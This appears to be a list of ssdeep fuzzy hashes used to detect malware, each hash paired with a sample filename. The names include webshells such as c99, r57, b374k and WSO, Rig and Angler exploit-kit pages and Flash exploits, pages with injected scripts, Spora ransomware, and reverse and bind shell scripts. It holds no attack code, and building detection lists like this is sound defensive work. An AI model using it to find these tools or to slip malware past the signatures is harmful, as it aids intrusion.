+768:d3VHUzHfIT2m7QGau4/OPzOrWIjF8uh+09bibAGTX:d3VHUz/ITDQG7466H8uh+0QPX,"google.jpg"
+768:D2WqNdNXRkyWUEZ+Zep59RWPPYqDTGNQi+/qVJFv2VNh4urXiN/XKHN8:D2lNdNXRDWnkYDfCP0pgU2Vsurs/6t8,"b374k-2.3.min.php"
+768:d2NZJelZV3OOXHKUdPzz9T2l3gql6D65exyeAi2nQiE8aJ/m3u85pfuUMIubI3q1:yWnaUzf+TQjJelpfuUgbI3GZfw7KTZkI,"2016-01-29-page-from-cavallinomotorsport.com-with-malicious-script.txt"
+768:cZfFSQSCfm3RttqykSySJSHqFEXadr12/+szwsE1IacVTljF0v95J76M:cLSQS0meSySJSHq+Gh2/+szwsE6ac9M,"PHPShell_Priv8_by_MAX666.php.txt"
+768:cs0hv8FKwvQTDIWU4OXxTVRKUtFGiQiBQTp1Fy+mvWic+P9OmmopGXhQ2:cs2kFKwvD5LtqrvcOep6H,"2016-08-01-page-from-theelectroniccigarette.ca-with-injected-script.txt"
+768:CmzaeGyt8vl+/Amb2SeyC78dEjbXOgKXtX40BnlYSXWHjQM+QCH0:CmzaeGIWTy3KjblKx40BnlJXc+QCH0,"2016-02-07-Rig-EK-landing-page.txt"
+768:cMnI2zrp1o6fTplkSyuJd/3Q4Awoc2tKjP7/qOAJc9sRG/ouB9XjgbBSmQA7Gsf:znI2rFbprygZGAveDRG/ouBpkImQwG+,"simple.php.2"
+768:CGPvpoqJVVxNNsRxDOtxBc4DuKBFzYH/rplLxQg:bvpf3Igfa,"tryag.txt.001"
+768:CGPgpoqJVVxNNsRxDOtxBc4DuKBFzYH/rplLxQg:bgpf3Igfa,"tryag.php"
+768:c+/d9kpQ42GRmk24fKpcJFPH8owv4+L0id6AhtA:F/d9kpQ42GFwQK0id6AXA,"vop.txt"
+768:CCckwRWSn2Xrcm5pDfLENvb2EWUSikhd2NI2CvXfi:sWSn2XLDfL2z2BikL2q2CvXfi,"image.335"
+768:CCckwRWSn2Xrcm5pDfLENvb2EWBwuikhd2NI2CvXfi:sWSn2XLDfL2z21wuikL2q2CvXfi,"image.338"
+768:CCckwRWSn2Xrcm5pDfLENvb2EWBPvikhd2NI2CvXfi:sWSn2XLDfL2z21PvikL2q2CvXfi,"image.337"
+768:CCckwRWSn2Xrcm5pDfLENvb2EWbPikhd2NI2CvXfi:sWSn2XLDfL2z2fPikL2q2CvXfi,"image.336"
+768:c11jFjVzXbh81Sm1X1p4mhP0+26zNg/EqNUS7yyBzx2h:c11jFjVzXbu1Sm1X1p4mhMMZg/EqNlPA,"googlecheckout.php"
+768:C0bU4SbqX+4jl7EBNRjal0OC5eVdVIhyTuIqYDvNTbervZWhVZ21wNX2u89VACrn:BbRSbqOMl7WtaK5ejVeI9zNvoWJD899h,"main.jpg.php"
+768:BZuTUVnIklZxzBeHb60eKGvwigCjCb6Re7AW8eaxi0tQLeCRDgJouNu:HuTqnIkPxN4reKGvwigCjCb6Re7AW8eh,"zehir4.php"
+768:BZuTUVnIklZxzBeHb60eKGvwigCjCb6Re7AW8eaxi0tQLeCRDgJouN7:HuTqnIkPxN4reKGvwigCjCb6Re7AW8eo,"zehir3_02_by_zehir.asp.txt"
+768:bz6wOS5tYKh2GjgZHDZuxVIH5b6x/2MEDVDVmED1PwP9lKs49rHZvcoc22iJ:bBYW2xZHDZuxVIH5b6xeTVD+P9lx49rh,"MYSQL Manager -Asp.net Silic Group Hacker Army专用版本.aspx"
+768:bz6wOS5tYKh2GjgZHDZuxVIH5b6x/2MEDVDVmED1PwP9lACs49rHZvcoc22iJ:bBYW2xZHDZuxVIH5b6xeTVD+P9lE49rh,"mysql.aspx"
+768:BxcM4zVdPhvZ3F3AsrRKeu2U4R3UzK9swvNZbjIKeG5WQv2YKyuLKb6+:BxcpZh13zKe6I3U29sw7bKQv6vgn,"c99.rar.001.001.001"
+768:BvHA9GYIJa5I5fPTTkhEWhb2kOdqqrdTyHh7Oq6tIA:BvHA9CGKXTziatF,"20160131-070314-Vq0lEmjuZ1YAACx5KUAAAAAX-file-UT5Yqg.1454187795_1"
+768:bV57tGkznRsPygH+lnR6E0RSB+0mcZ+0gblUKnvSqZfENcEkYYc1zd3:5LnRsPyPlnEE0RSB+0mcZ+9blUKnvSqo,"2016-03-02-page-from-dompetdhuafa.org.au-with-inject-script.txt"
+768:bU88pywZRiO5sN2j50hSmP7KopNkSHE6tbKOjXjxFVZ5r/VpiCtnEwdI7:uYjPpeSk6tbKOjXjLXF/VFtnEwdu,"scy_oracle.jsp"
+768:bTvUAyAAjOJEngOlo/8f6xbeijcJDkjVE1N9W+SJ1LaWVko38h:b4NEvM+EJoxYN989uLh,"c99.zip"
+768:bplLHEo8iKEdq/jX3ax2AtqD9FLSL0jWkdIlkEfU93CFhJuIU4iMENRb9:n8Ic/jqx2rD9FLtW893ehrU/J,"17876.28301.php"
+768:BpKGmOXS2Y8EaFYq80JJtqbz1WB0l+LleqNH2bn424h9XAqcT8feyq8mQMZ+VbYm:SJUBE30vtGz1gJVHAngXAqcTzyq8ml+Z,"dk.rar.001.001.001"
+768:bJzdfWN20VLzmUa+KnXIRcIIeiDv8kh+yii23YyTVC8jOtk/xk/f0r:NINna2khDWTFO0r,"Backdoor.ASP.Small.o.asp"
+768:bdy3zRlJMKgtF9gve/89THmfGVnJBo3NEcFx+/zPDYKdCu2P+S:bdwzut/9Ie/89THmfGBSNEcFx+bPD2WS,"gfs_sh.txt.001"
+768:bdy3zRlJMKgtF9gve/89THmfGVnJBo3NEcFx+/zPDYKdCu2P+B:bdwzut/9Ie/89THmfGBSNEcFx+bPD2WB,"gfs_sh.txt"
+768:bdy3zRlJMKgtF9gve/89THmfFVnJBo3NEcFx+/zPDYKdCu2P+B:bdwzut/9Ie/89THmfFBSNEcFx+bPD2WB,"gfs_sh.php.php.txt"
+768:bDOE48lF5ERTFgWtkwPc0WkX8QtpKBTBkx8ctuY6/M6ihn5fU1Jhdaf1LxzCg4Ee:bqEBlFsk63XsQCTBkKctfdxz0T43o,"madspotshell.php"
+768:BDcwJfcODJ/BvsV5QBb0fG272K2tLDzP9JYO0HmAXsOhRa9XYXIeOMj4G+6OUK1D:xJ/BU7WeXabWHmAXzhGRi4G+RUKyPX38,"G5_Shell-v1.6.php"
+768:bcxnJVOccwKDTf1VcgibPep7LWebgfT3ovWc6CAc5esZQpBmYXp2dccBxeL4cccA:bcVJUccwsTfvcgiTep73gfT32Wc6CAJk,"+REcovER+tylbv+.png"
+768:b/aL5j7mgb4ajET23+33PTAlFJrvV96a0w1eZVUZecV/x0Ptfb/yIp7f:bCj7mgfjETNPTAlFJrvVB1eZVUZecZsH,"Persistence.psm1"
+768:B3Xo00SWcY0JPpCK8y2Bv8Kr6RPzjlcVrUtqMyLJVGY8gwloUOVARY:RXo00SWcrpCW2Bv8JRPzjlcVrUtqMyLD,"BackerHack JSP Manage-System 1.0.jsp"
+768:B2IYpPj6en2PUtxwXCGi78K7y3CRFq1ih2sRpAmg518nDJrK4IWGZT6hwew2VQ:srIXXCGi78K7D/q1iYsRpg5rWwT6h7Q,"r57shell1.22.php"
+768:Ay3BB+DfE57GgVM6Ee1X2PDUrs2PhPD447T8Gjc51wTV1K6Hs4NbcSi:VrGE57GOnAp2pUOcjwTV1K6lQSi,"2016-05-27-Rig-EK-flash-exploit.swf"
+768:AsZHqpOHpCHbvQkIIFDkpPCLLCr1g0VTUBx4hThaiaHDzXm:AsZH+OHpCHbvQkIIFDkpPC2dUmhThaid,"2016-03-29-page-from-localtasteblog.com-with-injected-script.txt"
+768:ANtwts8OMvCZp8icejn5Sw+dK8V9SAMY8VeWM5bko7vlLOburI3AMEVP:Uwts1MvCZp8icS6FMu,"K8Packwebshell.aspx"
+768:AkGdeMDcgVKNlNO4sqcsOzaimWOxwfX86vVgMymPFdoUy7Rt1K:aDcNgbEphByfX86vN9xyTI,"b374k-2.5.php"
+768:AiOGZAkKUJGshek1IWggpRd9cHQ3kYjntatY0+9ZkZlQz4:AiOGpRJVbn+lQz4,"sos.txt.001"
+768:ag9fYMo1ZZsK9gVpzs6tT7bknQO9NqjtahOb/TOHHXrSMjca+xwRtgykh8bqNzQX:ag9gLCTztp+lqC3fmuRtgj6biQAgv,"ctr.php"
+768:adyinqNuDnN0+0Fca64ZsnqaxcSsDKLct/skrOacN6JssHMLeXBO6BT2dv:aWOnN0+0Fca64Z2gOv,"ekin0x.txt"
+768:adX5R3zSBzc5HO78wVg8/mmm3UViGaJK2Qn9qC4WbVOgELTo4sML0:03+kugwVh/mLbJK7qC4WbVfEv7sMQ,"2016-05-31-pseudoDarkleech-Angler-EK-flash-exploit-both-runs.swf"
+768:abM+COW3tGWqrBijU8ydNi8zSCnp60ViagIZ+ppU:azCOWdtqrBijhydNi8zHnp6Eiag5ppU,"2016-08-17-page-from-agreen.com.tr-with-injected-script-second-run-EITest-only.txt"
+768:A43zK4262pfYBc0qD61jLfh9f2bpn+b9oenJHZAParxfErcFOVjGcnLSfCCiUblk:AuM6afkXqDyjLb2bpnsGenJ+cgVqcnLP,"Backdoor.ASP.Ace.af-海阳顶端网ASP木马＠2005α版vhack改版.asp"
+768:9l2vi4gO6hVxNDcvmOgu5JTXqynH4Cl3TQ:fWi4gO63xNDgmYXRnYClU,"97d7b78a41795c0f429da92e6168128b_php.txt.orig.001"
+768:9iR3EJXvOiMPX6gJ9RYoQTVqDf96Qctt6rpdgTLuTDQc/vkgpKilp/L+54Y4j3Z:9O3aOiMPXzJvwVqDluOgTLuTDQMvkgpv,"2016-06-01-pseudoDarkleech-Angler-EK-flash-exploit-sample-2-of-2.swf"
+768:9H4Rag/isZutwxjBrR97Br00T5zBT55Te91FGf49sw5bFZ4J:54RayiR94J,"r57shell.php.php.txt"
+768:9DVeyYAr3gNm6+0Pf9pTtbBhZn6BVKcQWgiAIc5AbSl3T8e/d:Le2TgE+f97D8fFQvrT2uN84,"xmlrpc.php"
+768:93DbcCKU+QTBoUKMdvcycSXnTiKSUuXgVtgB47p7jsNRl:dcUmEBHcSXbS9KtgBEZwp,"phpspy_2011-h6ss-obf.php"
+768:8zyYGjIN4O7F7/mC7B+azzTXcVkW/oeZD:8zFGjINP7eCjzzTXcVV/oeZD,"2016-07-07-page-from-lawrenceparkah.com-with-injected-script.txt"
+768:8/z3pEfiyy76Cr8cpi1t5Ln9LBDk7s0OGVA9nwj7uIUCo:P5y76dcpG7b9LBDUJOkA9tIUv,"RECHNUNG Nr. 558336.zip"
+768:8Xvd276jNA94mMEGaVoM6tim2lts4H8cdg5mtSVQYb9LG11M7gE/cNew5M8zKzZz:8X1LW4mjGZV89fs4cSg5OiQYbxGHM7g0,"simple.php"
+768:8s7aUEFVJjLD16LD+lSXC5iPpm76sPhZbXNMVuNOhOTdZ7scQqHFBBQBVBAq:8s7aLDD0L06pPpm76oLNy8g2yF,"c99_w4cking2.jpg"
+768:8PdrHIr/2Qz6MdmCijFpachJ5ElL7zYkcd5riugENJb:72QzpdmCiju2J5G7Qd5rnD,"Code.php"
+768:+8jYTGXyxdt8oDhNCTcgBMyShSCkcoJ5uZeJ6v7Eg:+r8oDhNC9//6jEg,"2016-06-30-page-from-pekabex.pl-with-injected-EITest-script.txt"
+768:7s9qrlVhgxfaU+K1u2qiULi+p9+Ek7J3HZFjp4S:g9qrBQOfXkB,"hkrkoz_by_hkrkoz.v1.0.php.txt"
+768:7QSPDyj8Wn1FnyQI5rmsEv+H6VlXwy2oFR5y0H/UUgO4w2/djslFKUVS4qG:7QWEh1FnyQI5rNwU4Xb2Eje/jUFdVS41,"aspydrv_01_by_Vela.vAPR2003.asp.txt"
+768:7AeOjQyzALXm425j1jvYVUTWq4EMX7mgfjP6sAYyDh6vmg2ure3vKxr9F8z9n:76jQyzALXm4Cj1kVUiq4BX7mgfjP6sA1,"Backdoor.ASP.WebAdmin.d.asp"
+768:72WqNdNXRkyWUEZ+Zep59RWPPYqDTGNQi+/qVJFv2VNh4urXiN/XKHN8:72lNdNXRDWnkYDfCP0pgU2Vsurs/6t8,"b374k-2.3.min.php"
+768:6ZuSwbhibrV4BK8bx7H85IzEMYAseHcRjxm18I+UZRezDrhvrv7ZeBKQUfcg7vU:6ZD+BMDxdiy78,"pps-v1.0.pl"
+768:6xLi32LBYqUr1R3gK+7X5m5wVmB3HzhoxueTQt:0i3oBYq21RgK+7X5JCem,"Arabic_spy_by_securedeath.php.txt"
+768:6UL4c8OxwyQRxMK5KDbeoq9w21CxXa95x9cgtGzlMBj+zfQJ3xKrPzYI:91YyQDiK9wCoa95x97GuYDQu0I,"2016-08-24-EITest-Rig-EK-flash-exploit.swf"
+768:6uGDtJj8vXxKaLiz0e0+x1Yt6ppy2bIMmEmIaCSaFsLjC+whHR/5j6eqMu7KF2NW:wjcXxKa1e0+dt7aVQ5Rif0pH3Kqgi6U,"VirusShare_f91b9c6a4b151c3a2786fc60c67de929"
+768:6UBRHTRTEqZTMmXXF9ao+jEL84ciLlVzoOoOoOo3f2KnFFOoCK:6UBZGqZT7XV9sEo4ciLoeQFFKK,"20140901-04.jpg"
+768:6txSs9FJLzPh510HSJt02bgYarEe5a7J+K1u2qiULkvTtIqi:6ys9FlznE0FbxarEe5Utoqi,"lnc.php"
+768:6l2vi4gO6hVxNDcvmOgu5JTXqynH4Cl3TL:mWi4gO63xNDgmYXRnYClH,"97d7b78a41795c0f429da92e6168128b_php.txt"
+768:6jJjQ75ul2jXeNu2aMhBuxG6mqvFvAqLUd:61ieNu2aMSc61vAqgd,"Private-i3lue.txt.001"
+768:6ChceyPficjJDNGrERGqCc/rQ4excbRyMv+eP0DFMgzvHhjbKkcAd:6ChceyPficDNExc/7FNH2FLzfhxcAd,"20160203-042705-VrD0@WjuZ1YAAHRyHWkAAAAq-file-2bJNGu.1454437635_1"
+768:5WcpNZvlnqTs4p4v/Y+/RpLbl6hGepWRLC8+1STKtEqjNRgXdd9DCZR4TqybnC:zZvlTMiShGeMR5d+TjNRg9DC74TdC,"id.txt?"
+768:5VAZXsleB5LIh8e91ni99TFGKUarSpiK2c+oJ5ZL9Cm0gMDcViLA2zih9V:DixHeObuAyJ3L9C9gMoVik2+hf,"stunxx.php"
+768:5iKMtm5OqkHiDu42kpXyHq441orrTi6NNIzXMvVWXpLLIhzCffSEfOt2YqIUgiUw:8t+VrlpXyK9o/TpVEpLIhzWIqIOUNO,"id.txt.2"
+768:5i6NDxfevjmjU9+oxxhlvh1aWtyhtfDIDi4Pxu1sP3PVJqsrFGiNwx+rZSVUqYHJ:0KDfjU3VvWz7bIDdxu1M3PfqsrFx/oo9,"bad.php"
+768:5i6NDxfevjmjU9+oxxhljuUlJ137xJJeT0uGA+T0FXK5ZuxRAkG66zzpZtj:0KDfjU3VftxJJeQNA+IBcuxRXGLJ,"bot.txt.002"
+768:4WkY7vO+L5tlWv+ZKS89OvD2JyiUUQrucD0cTB4dZUpaTnHpGRCd:j4+mG6JyibQKcYcTG5c0,"done.png"
+768:4/vLyh3E/AX5v507MEQYn6rGHjeopAyfNMmq1jc5dr9raeLN7BI:uu0Apvy7MK6EXBFG1jc5/9rI,"2016-04-07-EITest-Angler-EK-second-run-flash-exploit.swf"
+768:4UL4c8OxwyQRxMK5KDbeoq9w21CxXaS2OuM4zzH3W+DsUbFPoGL8Fs954j9QPEQQ:P1YyQDiK9wCoaWuzbRPtQFsPi4EQU/,"2016-08-22-EITest-Rig-EK-flash-exploit-after-best-remit.com.swf"
+768:4U81pywZRAb9m1I2ED0CHmP7K06w7Sh5tUiv3wq5+b7pOCZ/PmYFI5:uDzLPWKSh5tUifub7ZZnmYFO,"jshell.jsp"
+768:4rHq+CjAiNI7M83nu24WBFhPENTwZXCKWKsWu+JGU1/yhoYR7iZfZ/Q:cCj/WM83n3BzPENTOtsWBB1/Mlio,"plugins.txt"
+768:4l1jOx30O7DqWbkR7HvRHhdgshDw+w+hVnay2lr7yX8JQ/SDrGF:8S57LkR7FgWDw+HLn0Fu8e/Sva,"b374k.v2.1.php.txt"
+768:4hZjoXfH1pF0O6maMs3L/dVrCRGWQlKBC4R:4hZ8v1pFimaMALdwRGWQ8JR,"tiamo.php.txt"
+768:4hnuX7c8KFP6TNjm6WCn5ig0oG+wmKyKnpB2W2mme0V6/Fu1jvC:4hQc8KZkKtBNBNX0w/Qk,"Ani-Shell.php"
+768:4hnuX7c8KFP6TNjm6WCn5ig0oG+wmKyKnpB2W2mme0V6/FD1jvC:4hQc8KZkKtBNBNX0w/hk,"Ani-Shell_by_lionaneesh.php.txt"
+768:4dQw7SHY28ER+4oKGzMZAis1/H+ljHZ0jAJvWFkjr:4dQw7SHY2x4mZm1f+ljwAJvikf,"2016-04-13-page-from-medical-library.net-with-injected-script-first-run.txt"
+768:4Ae7jQyzALXm42HIkjvdVUTWqi2dU7mgfjP6sAYyDh6ve7R9lJYO/9t9F8z9n:4/jQyzALXm48IkxVUiqieU7mgfjP6sAA,"Backdoor.ASP.Titshell.WebAdmin.asp"
+768:4173XIOdiGji7yyPfsRoY48/SiD7Q3VM24wikiCD5xetPkyi+Wge2IoLBpljLMyD:cpkypsyDbPxpFnM6,"2016-07-29-page-from-carolinagodiva.org-with-injected-script.txt"
+768:3R82pWfP7z6weqm7FSxmEjcBMMSjfYM67mul:3RFpWfjm70xbjcKY33,"400.jsp"
+768:3NB9TQOPjtrnQFKwjYbCFKQDrKXIrdTql4PnaUxLl4I8YysinXT2CEv:3bthj+bjMwl1qq/LlhLinXTzEv,"2016-04-18-pseudo-Darkleech-Angler-EK-flash-exploit.swf"
+768:3fcqgcXfHVHm4aQ4HezM+d0wYvsGCt2HMdGNvOTBMNIJD:z3X/VIBHcM+d0wYkxEMdL,"2017-03-06-Spora-Ransomware-6th-run-Chrome_font.exe"
+768:3CyH9h8xJIanz7KQ/kdNZceCHPHJjUzj0:Bh8bIanz7KQ/kdNZceCHPHJjUzj0,"good.php.19"
+768:3CUH9h8xJIanz7KQ/kdNZceCHPHJjUzj0:3h8bIanz7KQ/kdNZceCHPHJjUzj0,"good.php.26"
+768:3CqH9h8xJIanz7KQ/kdNZceCHPHJjUzO0:th8bIanz7KQ/kdNZceCHPHJjUzO0,"good.php.22"
+768:3ClH9h8xJIanz7KQ/kdNZceCHPHJjUzO0:ah8bIanz7KQ/kdNZceCHPHJjUzO0,"good.php.23"
+768:3CanH9h8xJIanz7KQ/kdNZceCHPHJjUzO0:jdh8bIanz7KQ/kdNZceCHPHJjUzO0,"good.php.25"
+768:3C4H9h8xJIanz7KQ/kdNZceCHPHJjUzO0:vh8bIanz7KQ/kdNZceCHPHJjUzO0,"good.php.24"
+768:3C1H9h8xJIanz7KQ/kdNZceCHPHJjUzO0:Kh8bIanz7KQ/kdNZceCHPHJjUzO0,"good.php.21"
+768:3C1H9h8xJIanz7KQ/kdNZceCHPHJjUzK0:Oh8bIanz7KQ/kdNZceCHPHJjUzK0,"good.php.18"
+768:35qzWQEPSRpMX5MME6Ki5eX9z6Ok6LEy42ybPKi5kp73Hz6X:35qzFEPkpsMMEtz6Ok6LEy42ybSHz6X,"sad.txt.1"
+768:3+0ZDZ9ZgnCAxC1LTyXqTdbtPNDseFc8qaSKFzfFQMMAiC7jUo:u0v9ZOhkTy+dBPN4eW8bfAXa,"20160207-020735-VrYaR2juZ1YAAG0zACAAAAAL-file-K0Kw3f.1454774856_1"
+768:30bU4SbqX+4jl7EBNRjal0OC5eVdVIhyTuIqYDvNTbervZWhVZ21wNX2u89VACrY:kbRSbqOMl7WtaK5ejVeI9zNvoWJD899W,"c99madshell-v2.0-madnet-edition-smowu-obf.php"
+768:2tIYZx1+svJ0HfBSyEbC/e4s9EceEQkC3Unjt5/OPu5ZChnr4TRDTJ/KF8eNqbKU:2VZx1+s7xjtsPA6r4TRDVaNhTK,"nsTView-v2.1-pw-nst.php"
+768:2hAl8yTFm3s7/INAX2fe8f7XpBjL9T07kNeqiKr:2hAlT7IyX2ftDXpBjL9jN71,"x.jpg"
+768:23DoKuc8utOiijHVTjIlOemkt0E5vFqqkEIrxwu8iiY2T9H4YvvB0lVI/D3OYR:2sv7jIlOaFv0yPB0li/iYR,"2016-06-21-page-from-xenon.com.au-with-injected-pseudoDarkleech-script.txt"
+768:22k92rinDe6UMeoVy/khWKh+VQfsU+N6XyxJv:2TzDe6UMHVy8hWn6vml,"4.png"
+768:1YrMpVvLZYquFjVfrhFjhYB03zSnIdju4BTDEKw3PX+mig9mUxOSd:1dpVvL6qMjVffVf3zSn5JdmUxOSd,"beyaz_hacker.php"
+768:1YID0CQM3nisUOy7MsyH3pAVmB3HzholueTE:D0A3nisUOyQsa6Wew,"phpspy_2005_full.php"
+768:1YaZwkXd0QBUrLkLXb/hjCV2ckOgvkQ0nbJLUJcc0IGRiTflEJQpQbdj:aGNDwLyrF+2fvkQ0nVwJcHZiJEOpmdj,"r57modded.txt.001.001"
+768:1U81pywZRAb9m1I2ED0CHmP7K06w7Sh5tUCfYeG9Bnwq5+b7pOCZ/POYDIX:tDzLPWKSh5tUCfYeGvub7ZZnOYDO,"2.jsp"
+768:1RXROeVdAoe7GoqwjLBm94icJd5/BLUihTj99C/3Zt6LXOOoda3b:1RhfdAoe7GoqwjtxvDCipjw3z6aOodar,"Backdoor.ASP.Ace.cc.asp"
+768:1RJq4JzBEi/IBouClZMTV+gL0cdEtVNM25+31QJ:1RJq4JzBEi/IB9kMTV+gPitVyI+316,"Backdoor.ASP.Small.c-sql.asp"
+768:1nYnQtAjDKva7OF3O3RbbJLPMs7TAwdmIIY+wRZMjyfuIzh1qzI55D:1YnQ2jGaqybbJLPMrwdTR2jyf7zh1q0D,"WSO_by_Orb.v2.0.php.txt"
+768:1MFthonAWvMbw8j2yZsFhM8kQRwVIch19ijr1hEm5K:imnfvMrjHZuY,"Surabaya_Blackhat_Shell.txt.001.001"
+768:1Kv7wWmZtq1M+fnbcRK0RcMl9RuOvEIOSoAzxWWbbkmBaxghmlrHoRRyM8:1Kzkt0M+fnAf9kO51pa+hirIRRy9,"aspydrv_03_by_Vela.vAPR2003.asp.txt"
+768:1Kv7wRmZtq1M+fnbcRK0RcMlyRyOvEIOSoAzxWWbbYmBaxghmlcGoRRyMR:1KzJt0M+fnAfyAO51p2+hicpRRy8,"aspydrv_02_by_Vela.vAPR2003.asp.txt"
+768:1Kv7wRmZtq1M+fnbcRK0RcMlyRyOvEIOSoAzxWWbbYmBaxghmlcGoRRyMgVse:1KzJt0M+fnAfyAO51p2+hicpRRyJse,"aspy.txt"
+768:1Kv7wRmZtq1M+fnbcRK0RcMlyRyOvEIOSoAzxWWbbYmBaxghmlcGoRRyM8:1KzJt0M+fnAfyAO51p2+hicpRRy9,"aspydrv.php"
+768:1Kv7wRmZtq1M+fnbcRK0RcMl9RuOvEIOSoAzxWWbbkmBaxghmlrHoRRyMp:1KzJt0M+fnAf9kO51pa+hirIRRyy,"a75188dcb24265710ae863c4f0641f86.asp"
+768:1Kv7w3mZtq1M+fnbcRK0RcMl9RuOvEIOSoAzxWWbbkmBaxghmlrHoRRyM8:1Kzbt0M+fnAf9kO51pa+hirIRRy9,"aspydrv.txt?"
+768:1eyp+qgcXfHVHm4aQ4HezM+d0wYvsGCt2HMdGNvOTzMNIJD:Fp3X/VIBHcM+d0wYkxEMdp,"2017-03-06-Spora-Ransomware-4th-run-Chrome_font.exe"
+768:1ANLFOPigd8q38UjeJpnyeS8HWWP6yHtREd/xulE:20387nyefWdJaE,"hididi.net.txt"
+768:0xvNr5eeSIg0uKXYZniXnzlEvf/GGk9Vtwaoij2AFI:kvNteeSI+KIZiXlGk9VtwaoijVI,"sh.php.2"
+768:0WDtgRZT9vDbln0UAbjKhbWOTZeY6QkpBhcfuH3IwG+M992BueZd3WULBNYyExRY:uRZVPVjAeWMZ9F6cGY+M/4dGkjoCr,"c100.zip"
+768:0oACgJm3hShLqozDGibg/NnSHruw1YZULlvHXjXpVY6wNccU:0NGGmNnSTYZMXjiNa,"2016-08-22-page-from-best-remit.com-with-injected-EITest-script.txt"
+768:0Kv7w3mZtq1M+fnbcRK0RcMl9RuOvEIOSoAzxWWbbkmBaxghmlrHoRRyM8:0Kzbt0M+fnAf9kO51pa+hirIRRy9,"aspydrv.asp"
+768:0hJf6kjkN/uJOelxwbkuoyr8OWK2Jh4lCWQgBR7rLXhmmRMovW6z/91ephN:ebjc/OekuoyWJhvg/xmLojz/9ShN,"5.png"
+768:0fPnl6REZCvSEa1fBodEs3m5ZVu7/7dXztV:yN1fBguYzfV,"filesman2.php"
+768:/0bU4SbqX+4jl7EBNRjal0OC5eVdVIhyTuIqYDvNTbervZWhVZ21wNX2u89VACrY:cbRSbqOMl7WtaK5ejVeI9zNvoWJD899W,"c99_by_madnet.v1.0.php.txt"
+768:08xK2JTG1X+RlZU2HIWBSMC/MUCQO2nKJ0:xliXub36MUW2nKG,"_index3202.php.txt"
+768:04JKJh+uGW1QvIn1X/mnJ/pP7szaz7qAxPZh:04JONf2vu1gxso7VZh,"2016-04-18-page-with-injected-pseudo-Darkleech-script-from-altanticeyephysicians.com.txt"
+768:00j49C3hwfhqF3eNBDrYAWhcdz1Bab06bVwz4H:0BShwfhQ3ezyhCaA6bVwzI,"2017-02-27-EITest-Rig-EK-landing-page.txt"
+6:ZWg3Ngo13O82TGmTvRv000ipOwTQtsrHncvSlTUV/Ao9Oy1qY46KqqoA:ZWZo1Z1mTi1vtsjn9eAonEqk,"really-simply.php"
+6:ZWg3Ngo13O82TGmTvRv000ipOwTQtsrHncvSlTUV/Ao9Oy1qY46Kqqo0:ZWZo1Z1mTi1vtsjn9eAonEqY,"simple-cmd-Dark-Raver-cmd.php"
+6:yL/pZ6kqlfssZ/JXw7daOtt4qR/VlRK39EJ256Dc6BfTOE/TNt30+K5n:iKkA1xAzt4Idy+vZBH/D3DK5,"2016-07-19-nepal.laderatutors.com-rokmediaqueries.js.txt"
+6:yL/pZ6kqlfsqsZDJXwm3jtawqWdRm5GZKSVaPK1yP6/FKEOK5n:iKkA6FAm35pDlKSoQyC/FfOK5,"2016-07-22-leon.stmaryschoolmt.com-scripts-jquery.form.js.txt"
+6:yL/pZ6kqlfs5sZXdJXwQtMRqSAgRtWOaJC/fffFRlK5n:iKkAf3AeaFRtPZ/HtXK5,"2016-07-22-start.puterasyawal.com-js-addOnLoad.js.txt"
+6:yL/pZ6kq2rwD00t0iZWHhFIF/nnaEpHXsLPiJK5n:iKkG7j6FO7XPJK5,"2016-08-18-green.lasotras.cl-scripts-all.js.txt~"
+6:yL/pZ6CYWQjqlfJcZX+JXw/trcLqOc3NHp9oWcvSNP6/Loh0+K5n:iKjWQjAEuAVwLY3NHpgZ/Loy+K5,"2016-06-30-Afraidgate-redirect-from-live.keeprunning.com.br-js-node.js.txt"
+6:yL/pZ6CFRNqlfMKZXiWJXw6FtoRqYA0cunyzt89K+K5n:iKkA37A6foRFauWC1K5,"2016-06-21-Afraidgate-galop.serviciosgeologicos.com.ar-script-widget.js.txt"
+6:yL/pZ6CC+qlfFZXcV0AJXwytrZVLqIs4r3/VIV5OuqzKBwcEsK5n:iK0ALMV0AAE1VLU4reV0uq2BdEsK5,"2016-06-29-afraidgate-redirect-from-live.keeprunning.com.br.txt"
+6:yjrt0k1ABwdIvXePXCCOQoFvXJYlq+860Fq9PN:mN1AeIWqYlPP9PN,"Path.py"
+6:YgW2AsihnVg/nx7bC2kYS5faArJPD9g7TpY1L7mJ5bHKrRezomfB4lR63bv:YgZI6/nxnkYqfaKPDwwL7+5rJBAY3bv,"fuck2.php"
+6:ycVgkXbjQ8pYQDQGMwk3X3QLk3X9ojXsLk3X0uXXhk3Xboxk3XYoxk3Xt4AnUJJF:Zgsjvp3OwS8lroexUW5WCtUJE3nev,"redirect6.php"
+6:ycGQWNkUSxXFpogZH3Z3hVGFru6NKRkoBs0Plvk+AgbGLGzmwHfJsc55112xAG:u6Ltn53ZRVGFtNKfBPPlvRAgCLGzxJsp,"iuhgf.php"
+6:yAOuTNgiKG0RQ7rwrfwOLLQSH/ex8JFx8JEx8JXHfMynv:LXTNgpzWv2FH/eCPC+CxHfMAv,"reverse-python.py"
+6:yAOpNgiKG0RQ7rwrfwOLHV2uSFQwjeFlJFFlJEFlJXHfMynv:L6gpzWv2FJ+F3eFlPFl+FlxHfMAv,"bind-python.py"
+6:Y5xCSfmO4MuOliGV5mGVzGVsEK4ziFYJCblAMf6Fa4GNDSfbYJKQVoaAMQAFV8Mo:Gze+uOlFXSsE2PlAMf6GNOMJPoLvQm,"2016-05-31-CryptXXX-decrypt-instructions.txt"
+6:WWxtBQpsa+Nx+3Hk+/Q+M2Q+8E+NHk+/+uE+M2Q+w+W+uE+MSCFY16aw+3+W+/QJ:WWtBxld1Z8F8SP3AJCFHx,"zone_hackbar_beutify.php"
+6:WWkMxRhV9LNtvGgfWkVWiYGa0gXVWk7RLgXVcbBJX6a1RfWEAbymw:W6vPbOG4GwJ4MZvBAby7,"zone_hackbar.php"
+6:WWErRIO3O0NphVF7/n7pJgphVF7/6ZpJm70MJtRJANoO3O59bIO3lLKy3+2JRM2Q:WLIO3OsVF7/1KVF7/c0VRJooO3O5FIOU,"replace.php"
+6:WVAeT2dJAwedRWR0iYBWtp+E52f+CLXyA6EM/7eLTEdYJOSsQj6JYVsCJWa2+yQ:WVAS2dJAwCr1zElyj6FeLT7ASxOYVhZr,"make2.php"
+6:WOTFVVMT9rWW17tSCFPd98gGTdWDj0SDsFWwjAYNx7dqIwdgXHv6P/IeHNetYV:WGzW155KdWDj0mkWwEYNx7JAgSPdGu,"test.drivull.txt"
